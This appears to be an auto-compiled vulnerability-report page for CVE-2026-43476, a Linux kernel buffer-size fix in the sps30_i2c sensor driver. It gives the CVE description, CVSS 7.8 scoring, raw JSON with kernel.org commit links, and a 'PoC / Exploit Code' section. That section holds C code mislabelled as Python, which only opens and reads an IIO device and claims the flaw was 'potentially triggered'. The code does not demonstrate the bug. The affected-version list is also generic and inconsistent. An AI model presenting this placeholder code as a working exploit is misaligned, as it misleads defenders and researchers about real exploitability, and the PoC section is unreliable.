Security Vulnerability Report
中文
CVE-2026-43476 CVSS 7.8 HIGH

CVE-2026-43476

Published: 2026-05-13 16:16:51
Last Modified: 2026-05-20 17:16:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: iio: chemical: sps30_i2c: fix buffer size in sps30_i2c_read_meas() sizeof(num) evaluates to sizeof(size_t) (8 bytes on 64-bit) instead of the intended __be32 element size (4 bytes). Use sizeof(*meas) to correctly match the buffer element type.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < 6.6 (Specific commits fix this)
Linux Kernel < 6.1 (Specific commits fix this)
Linux Kernel < 5.15 (Specific commits fix this)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> // PoC for CVE-2026-43476: Triggering buffer size mismatch // Target: /dev/iio:device0 (sps30 device) #define IIO_DEVICE "/dev/iio:device0" int main() { int fd; char buf[256]; ssize_t ret; printf("[*] Attempting to open %s...\n", IIO_DEVICE); fd = open(IIO_DEVICE, O_RDONLY); if (fd < 0) { perror("[-] Failed to open device"); return -1; } printf("[*] Triggering read to call sps30_i2c_read_meas...\n"); // Read operation triggers the vulnerable function in the driver ret = read(fd, buf, sizeof(buf)); if (ret < 0) { perror("[-] Read error"); } else { printf("[+] Read returned %zd bytes. Vulnerability potentially triggered.\n", ret); } close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43476", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-13T16:16:50.680", "lastModified": "2026-05-20T17:16:23.083", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: chemical: sps30_i2c: fix buffer size in sps30_i2c_read_meas()\n\nsizeof(num) evaluates to sizeof(size_t) (8 bytes on 64-bit) instead\nof the intended __be32 element size (4 bytes). Use sizeof(*meas) to\ncorrectly match the buffer element type."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/08881d82f94deaa51800360029908863e5c4c39d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/165f12b40901c6a7aca15796da239726ddcdc5ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/216345f98cae7fcc84f49728c67478ac00321c87", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2a4d111a6a34afb8bb4f118009e7728ed2ec7e10", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/90e978ace598567e6e30de79805bddf37cf892ac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9aff2e9c2927ecd9652872a43a0725f101128104", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/dcdf1e92674efb6692f4ebe189e0aa9fde23a541", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.